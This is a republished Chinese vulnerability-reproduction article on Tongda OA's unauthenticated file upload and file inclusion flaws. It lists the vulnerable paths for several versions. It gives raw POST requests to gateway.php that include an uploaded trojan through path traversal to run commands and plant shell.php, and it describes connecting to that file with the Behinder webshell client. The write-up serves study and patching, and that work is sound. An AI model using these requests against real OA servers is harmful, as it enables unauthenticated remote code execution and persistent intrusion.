首页 > 分享资讯 > 建站教程

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

时间:2023-11-02 20:20:46人气: 栏目:建站教程
【导读】:四眼客目录在线提供,通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析建站教程爱好者免费阅读。本文地址:http://www.ooooke.com/news/83.html

一、漏洞介绍

通达OA介绍:

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,北京通达信科科技有限公司是一支以协同管理软件研发与实施、服务与咨询为主营业务的高科技团队,是国内协同管理软件行业里唯一一家央企单位,中国协同管理软件的领军企业。

通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限。通达Office Anywhere采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。

漏洞影响的版本有:

V11版、2017版、2016版、2015版、2013增强版、2013版。

备注:

无需登录,前台即可实现漏洞利用

2013版:

文件上传漏洞路径:/ispirit/im/upload.php

文件包含漏洞路径:/ispirit/interface/gateway.php

2017版:

文件上传漏洞路径:/ispirit/im/upload.php

文件包含漏洞路径:/mac/gateway.php

漏洞环境:

靶机(Windows server 2008 R2)IP:172.16.0.45

通达OA:V 11.3版本

二、环境搭建

(1)下载通达OA V11.3版本以后,点击运行TDOA11.3的应用程序运行文件

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(2)确保80端口不被占用的情况下,将应用搭建在80端口,然后点击下一步

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(3)配置完成

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(4)查看搭建的结果

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(5)账户为admin,密码为空,登陆到后端系统

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

三、漏洞复现

3.1 任意命令执行

(2)存在无需登录即可上传任意文件的前台漏洞,攻击者可以通过抓取数据包、修改并重放数据包的方式,上传后缀为jpg的木马文件来攻击系统

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(2)查看运行结果

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(3)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,即可实现执行任意命令

此处执行命令“net user”

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 71json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=net user

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(4)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,即可实现执行任意命令

此处执行命令“ipconfig”

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=ipconfig

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

3.2 getshell

(1)前台任意文件上传漏洞:抓取任意数据包,修改数据包进行重放,上传后缀为jpg的木马文件(木马文件执行写入文件操作)

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(2)查看运行结果

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析(3)查看/webroot/ispirit/interface/目录下的文件信息

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析(4)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,会在文件包含的根目录下生成一个 shell.php 文件

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/213131861.jpg"}&cmd=ipconfig

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(5)查看文件包含漏洞的执行结果

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(6)使用冰蝎进行连接:http://172.16.0.45/ispirit/interface/shell.php

密码为:pass

PS:此处用蚁剑和菜刀无法进行连接

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

四、加固建议

我们建议通达OA用户使用受影响版本登录通达OA官网,并获取最新的补丁。请根据当前OA版本选择所对应的程序文件,运行前请先做好备份。

标签:

版权声明:

1、本文系转载,版权归原作者所有,旨在传递信息,不代表看本站的观点和立场。

2、本站仅提供信息发布平台,不承担相关法律责任。

3、若侵犯您的版权或隐私,请联系本站管理员删除。

4、文章来源:本文由会员转载自互联网,如果您是文章原创作者,请联系本站注明您的版权信息。

网站公告 关于我们 版权申明 网站地图
Copyright © ooooke.com 浙ICP备15022117-2号